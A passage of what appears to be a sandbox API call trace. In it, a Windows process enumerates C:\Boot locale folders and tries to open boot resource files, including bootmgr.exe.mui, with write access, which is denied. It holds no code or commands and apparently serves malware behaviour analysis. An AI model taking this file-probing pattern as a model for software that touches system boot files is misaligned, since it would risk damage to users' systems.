Flags=0x0, Size=0x14) returned 0x6f668 [0070.584] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x7d090 | out: hHeap=0x20000) returned 1 [0070.584] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x6f668 | out: hHeap=0x20000) returned 1 [0070.584] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x4e0a0 | out: hHeap=0x20000) returned 1 [0070.584] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x885b8 | out: hHeap=0x20000) returned 1 [0070.584] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x4dfc0 | out: hHeap=0x20000) returned 1 [0070.584] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x7cfe0 | out: hHeap=0x20000) returned 1 [0070.584] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x6f0c8 | out: hHeap=0x20000) returned 1 [0070.584] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x46ba8 | out: hHeap=0x20000) returned 1 [0070.584] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x4) returned 0x7d070 [0070.584] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x14) returned 0x6f0c8 [0070.584] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x7d070 | out: hHeap=0x20000) returned 1 [0070.584] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x6f0c8 | out: hHeap=0x20000) returned 1 [0070.584] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x4) returned 0x7d070 [0070.584] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x14) returned 0x6f0c8 [0070.584] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x7d070 | out: hHeap=0x20000) returned 1 [0070.584] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x6f0c8 | out: hHeap=0x20000) returned 1 [0070.584] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88680 [0070.584] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x887c0 [0070.584] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88680 | out: hHeap=0x20000) returned 1 [0070.584] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0070.584] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0070.584] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0070.584] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0070.584] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x887c0 | out: hHeap=0x20000) returned 1 [0070.584] AreFileApisANSI () returned 1 [0070.584] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="C:\\Boot\\ro-RO", cchWideChar=-1, lpMultiByteStr=0x313f604, cbMultiByte=260, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="C:\\Boot\\ro-RO", lpUsedDefaultChar=0x0) returned 14 [0070.584] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0070.584] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0070.584] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x8) returned 0x7cfc0 [0070.584] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x8) returned 0x7cf90 [0070.585] AreFileApisANSI () returned 1 [0070.585] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x313f8e8, cbMultiByte=-1, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 14 [0070.585] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x1c) returned 0x88388 [0070.585] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x313f8e8, cbMultiByte=-1, lpWideCharStr=0x88388, cchWideChar=14 | out: lpWideCharStr="C:\\Boot\\ro-RO") returned 14 [0070.585] CreateFileW (lpFileName="C:\\Boot\\ro-RO" (normalized: "c:\\boot\\ro-ro"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x313f52c, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0070.585] GetLastError () returned 0x5 [0070.585] GetLastError () returned 0x5 [0070.585] SetLastError (dwErrCode=0x5) [0070.585] GetLastError () returned 0x5 [0070.585] SetLastError (dwErrCode=0x5) [0070.585] GetLastError () returned 0x5 [0070.585] SetLastError (dwErrCode=0x5) [0070.585] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88388 | out: hHeap=0x20000) returned 1 [0070.585] AreFileApisANSI () returned 1 [0070.585] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x313f8e8, cbMultiByte=-1, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 14 [0070.585] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x1c) returned 0x88798 [0070.585] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x313f8e8, cbMultiByte=-1, lpWideCharStr=0x88798, cchWideChar=14 | out: lpWideCharStr="C:\\Boot\\ro-RO") returned 14 [0070.585] CreateFileW (lpFileName="C:\\Boot\\ro-RO" (normalized: "c:\\boot\\ro-ro"), dwDesiredAccess=0xc0000000, dwShareMode=0x3, lpSecurityAttributes=0x313f5b8, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0070.585] GetLastError () returned 0x5 [0070.585] GetLastError () returned 0x5 [0070.585] SetLastError (dwErrCode=0x5) [0070.585] GetLastError () returned 0x5 [0070.585] SetLastError (dwErrCode=0x5) [0070.585] GetLastError () returned 0x5 [0070.586] SetLastError (dwErrCode=0x5) [0070.586] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88798 | out: hHeap=0x20000) returned 1 [0070.586] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x7cf90 | out: hHeap=0x20000) returned 1 [0070.586] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x7cfc0 | out: hHeap=0x20000) returned 1 [0070.586] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0070.586] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0070.586] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0070.586] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0070.586] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88388 [0070.586] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x883b0 [0070.586] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88388 | out: hHeap=0x20000) returned 1 [0070.586] FindNextFileW (in: hFindFile=0x78e50, lpFindFileData=0x313f1a0 | out: lpFindFileData=0x313f1a0*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xc4938cb0, ftCreationTime.dwHighDateTime=0x1d32764, ftLastAccessTime.dwLowDateTime=0xef698608, ftLastAccessTime.dwHighDateTime=0x1d3273d, ftLastWriteTime.dwLowDateTime=0xef698608, ftLastWriteTime.dwHighDateTime=0x1d3273d, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x313f518, dwReserved1=0x77892bc0, cFileName="ru-RU", cAlternateFileName="")) returned 1 [0070.586] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x4) returned 0x7cf90 [0070.586] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x14) returned 0x6f0c8 [0070.586] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x885b8 [0070.586] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88450 [0070.586] FindFirstFileExW (in: lpFileName="C:\\Boot\\ro-RO\\*", fInfoLevelId=0x0, lpFindFileData=0x313ef40, fSearchOp=0x0, lpSearchFilter=0x0, dwAdditionalFlags=0x0 | out: lpFindFileData=0x313ef40) returned 0x78450 [0070.586] FindNextFileW (in: hFindFile=0x78450, lpFindFileData=0x313ecc4 | out: lpFindFileData=0x313ecc4*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xc4938cb0, ftCreationTime.dwHighDateTime=0x1d32764, ftLastAccessTime.dwLowDateTime=0xc4938cb0, ftLastAccessTime.dwHighDateTime=0x1d32764, ftLastWriteTime.dwLowDateTime=0xc4938cb0, ftLastWriteTime.dwHighDateTime=0x1d32764, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0070.586] FindNextFileW (in: hFindFile=0x78450, lpFindFileData=0x313ecc4 | out: lpFindFileData=0x313ecc4*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xc4938cb0, ftCreationTime.dwHighDateTime=0x1d32764, ftLastAccessTime.dwLowDateTime=0xc4938cb0, ftLastAccessTime.dwHighDateTime=0x1d32764, ftLastWriteTime.dwLowDateTime=0x21107f25, ftLastWriteTime.dwHighDateTime=0x1d112e3, nFileSizeHigh=0x0, nFileSizeLow=0x12960, dwReserved0=0x0, dwReserved1=0x0, cFileName="bootmgr.exe.mui", cAlternateFileName="BOOTMG~1.MUI")) returned 1 [0070.586] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88450 | out: hHeap=0x20000) returned 1 [0070.586] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88658 [0070.586] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x887e8 [0070.586] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88400 [0070.586] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88428 [0070.586] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88400 | out: hHeap=0x20000) returned 1 [0070.586] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x887e8 | out: hHeap=0x20000) returned 1 [0070.586] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88658 | out: hHeap=0x20000) returned 1 [0070.587] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88748 [0070.587] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88428 | out: hHeap=0x20000) returned 1 [0070.587] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88658 [0070.587] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x68) returned 0x467b8 [0070.587] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x883b0 | out: hHeap=0x20000) returned 1 [0070.587] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x4) returned 0x7d010 [0070.587] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x14) returned 0x6f668 [0070.587] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x7d010 | out: hHeap=0x20000) returned 1 [0070.587] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x6f668 | out: hHeap=0x20000) returned 1 [0070.587] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x4) returned 0x7cf10 [0070.587] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x14) returned 0x6f668 [0070.587] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x7cf10 | out: hHeap=0x20000) returned 1 [0070.587] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x6f668 | out: hHeap=0x20000) returned 1 [0070.587] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88680 [0070.587] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88810 [0070.587] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88798 [0070.587] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x40) returned 0x533b8 [0070.587] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88810 | out: hHeap=0x20000) returned 1 [0070.587] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88798 | out: hHeap=0x20000) returned 1 [0070.587] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x40) returned 0x536d0 [0070.587] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x533b8 | out: hHeap=0x20000) returned 1 [0070.587] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0070.587] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0070.587] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0070.587] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0070.587] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x536d0 | out: hHeap=0x20000) returned 1 [0070.587] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88680 | out: hHeap=0x20000) returned 1 [0070.587] AreFileApisANSI () returned 1 [0070.587] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="C:\\Boot\\ro-RO\\bootmgr.exe.mui", cchWideChar=-1, lpMultiByteStr=0x313f604, cbMultiByte=260, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="C:\\Boot\\ro-RO\\bootmgr.exe.mui", lpUsedDefaultChar=0x0) returned 30 [0070.587] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88400 [0070.587] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0070.587] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0070.587] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x8) returned 0x7cf10 [0070.587] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x8) returned 0x7d010 [0070.588] AreFileApisANSI () returned 1 [0070.588] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x88400, cbMultiByte=-1, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 30 [0070.588] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x3c) returned 0x53298 [0070.588] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x88400, cbMultiByte=-1, lpWideCharStr=0x53298, cchWideChar=30 | out: lpWideCharStr="C:\\Boot\\ro-RO\\bootmgr.exe.mui") returned 30 [0070.588] CreateFileW (lpFileName="C:\\Boot\\ro-RO\\bootmgr.exe.mui" (normalized: "c:\\boot\\ro-ro\\bootmgr.exe.mui"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x313f52c, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x41c [0070.588] GetFileType (hFile=0x41c) returned 0x1 [0070.588] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x53298 | out: hHeap=0x20000) returned 1 [0070.588] SetFilePointerEx (in: hFile=0x41c, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x313f5e8 | out: lpNewFilePointer=0x0) returned 1 [0070.588] SetFilePointerEx (in: hFile=0x41c, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x313f59c | out: lpNewFilePointer=0x0) returned 1 [0070.588] SetFilePointerEx (in: hFile=0x41c, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x313f5b4 | out: lpNewFilePointer=0x0) returned 1 [0070.589] CloseHandle (hObject=0x41c) returned 1 [0070.589] AreFileApisANSI () returned 1 [0070.589] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x88400, cbMultiByte=-1, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 30 [0070.589] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x3c) returned 0x53370 [0070.589] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x88400, cbMultiByte=-1, lpWideCharStr=0x53370, cchWideChar=30 | out: lpWideCharStr="C:\\Boot\\ro-RO\\bootmgr.exe.mui") returned 30 [0070.589] CreateFileW (lpFileName="C:\\Boot\\ro-RO\\bootmgr.exe.mui" (normalized: "c:\\boot\\ro-ro\\bootmgr.exe.mui"), dwDesiredAccess=0xc0000000, dwShareMode=0x3, lpSecurityAttributes=0x313f5b8, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0070.589] GetLastError () returned 0x5 [0070.589] GetLastError () returned 0x5 [0070.589] SetLastError (dwErrCode=0x5) [0070.589] GetLastError () returned 0x5 [0070.589] SetLastError (dwErrCode=0x5) [0070.589] GetLastError () returned 0x5 [0070.589] SetLastError (dwErrCode=0x5) [0070.589] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x53370 | out: hHeap=0x20000) returned 1 [0070.589] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x7d010 | out: hHeap=0x20000) returned 1 [0070.589] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x7cf10 | out: hHeap=0x20000) returned 1 [0070.589] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88400 | out: hHeap=0x20000) returned 1 [0070.589] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0070.589] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0070.589] FindNextFileW (in: hFindFile=0x78450, lpFindFileData=0x313f1a0 | out: lpFindFileData=0x313f1a0*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x313f498, ftCreationTime.dwHighDateTime=0x3a, ftLastAccessTime.dwLowDateTime=0x313f420, ftLastAccessTime.dwHighDateTime=0x77892b2c, ftLastWriteTime.dwLowDateTime=0x69308, ftLastWriteTime.dwHighDateTime=0x313f210, nFileSizeHigh=0x3a, nFileSizeLow=0x0, dwReserved0=0x313f518, dwReserved1=0x77892bc0, cFileName="", cAlternateFileName="渘Ĉ㪀ā湈Ĉ̓⥠\x01⺊Ā")) returned 0 [0070.589] FindClose (in: hFindFile=0x78450 | out: hFindFile=0x78450) returned 1 [0070.590] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x4) returned 0x7d090 [0070.590] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x14) returned 0x6f668 [0070.590] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x7d090 | out: hHeap=0x20000) returned 1 [0070.590] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x6f668 | out: hHeap=0x20000) returned 1 [0070.590] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88658 | out: hHeap=0x20000) returned 1 [0070.590] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88748 | out: hHeap=0x20000) returned 1 [0070.590] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x885b8 | out: hHeap=0x20000) returned 1 [0070.590] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x7cf90 | out: hHeap=0x20000) returned 1 [0070.590] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x6f0c8 | out: hHeap=0x20000) returned 1 [0070.590] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x467b8 | out: hHeap=0x20000) returned 1 [0070.590] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x4) returned 0x7d010 [0070.590] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x14) returned 0x6f0c8 [0070.590] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x7d010 | out: hHeap=0x20000) returned 1 [0070.590] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x6f0c8 | out: hHeap=0x20000) returned 1 [0070.590] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x4) returned 0x7cf90 [0070.590] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x14) returned 0x6f0c8 [0070.590] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x7cf90 | out: hHeap=0x20000) returned 1 [0070.590] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x6f0c8 | out: hHeap=0x20000) returned 1 [0070.590] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x883b0 [0070.590] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x887c0 [0070.590] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x883b0 | out: hHeap=0x20000) returned 1 [0070.590] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0070.590] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0070.590] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0070.590] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0070.590] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x887c0 | out: hHeap=0x20000) returned 1 [0070.590] AreFileApisANSI () returned 1 [0070.590] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="C:\\Boot\\ru-RU", cchWideChar=-1, lpMultiByteStr=0x313f604, cbMultiByte=260, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="C:\\Boot\\ru-RU", lpUsedDefaultChar=0x0) returned 14 [0070.590] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0070.590] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0070.590] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x8) returned 0x7d090 [0070.590] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x8) returned 0x7d070 [0070.591] AreFileApisANSI () returned 1 [0070.591] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x313f8e8, cbMultiByte=-1, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 14 [0070.591] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x1c) returned 0x887c0 [0070.591] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x313f8e8, cbMultiByte=-1, lpWideCharStr=0x887c0, cchWideChar=14 | out: lpWideCharStr="C:\\Boot\\ru-RU") returned 14 [0070.591] CreateFileW (lpFileName="C:\\Boot\\ru-RU" (normalized: "c:\\boot\\ru-ru"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x313f52c, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0070.591] GetLastError () returned 0x5 [0070.591] GetLastError () returned 0x5 [0070.591] SetLastError (dwErrCode=0x5) [0070.591] GetLastError () returned 0x5 [0070.591] SetLastError (dwErrCode=0x5) [0070.591] GetLastError () returned 0x5 [0070.591] SetLastError (dwErrCode=0x5) [0070.591] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x887c0 | out: hHeap=0x20000) returned 1 [0070.591] AreFileApisANSI () returned 1 [0070.591] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x313f8e8, cbMultiByte=-1, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 14 [0070.591] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x1c) returned 0x88810 [0070.591] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x313f8e8, cbMultiByte=-1, lpWideCharStr=0x88810, cchWideChar=14 | out: lpWideCharStr="C:\\Boot\\ru-RU") returned 14 [0070.591] CreateFileW (lpFileName="C:\\Boot\\ru-RU" (normalized: "c:\\boot\\ru-ru"), dwDesiredAccess=0xc0000000, dwShareMode=0x3, lpSecurityAttributes=0x313f5b8, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0070.591] GetLastError () returned 0x5 [0070.591] GetLastError () returned 0x5 [0070.591] SetLastError (dwErrCode=0x5) [0070.591] GetLastError () returned 0x5 [0070.592] SetLastError (dwErrCode=0x5) [0070.592] GetLastError () returned 0x5 [0070.592] SetLastError (dwErrCode=0x5) [0070.592] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88810 | out: hHeap=0x20000) returned 1 [0070.592] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x7d070 | out: hHeap=0x20000) returned 1 [0070.592] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x7d090 | out: hHeap=0x20000) returned 1 [0070.592] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0070.592] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0070.592] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0070.592] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0070.592] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x885b8 [0070.592] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88798 [0070.592] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x885b8 | out: hHeap=0x20000) returned 1 [0070.592] FindNextFileW (in: hFindFile=0x78e50, 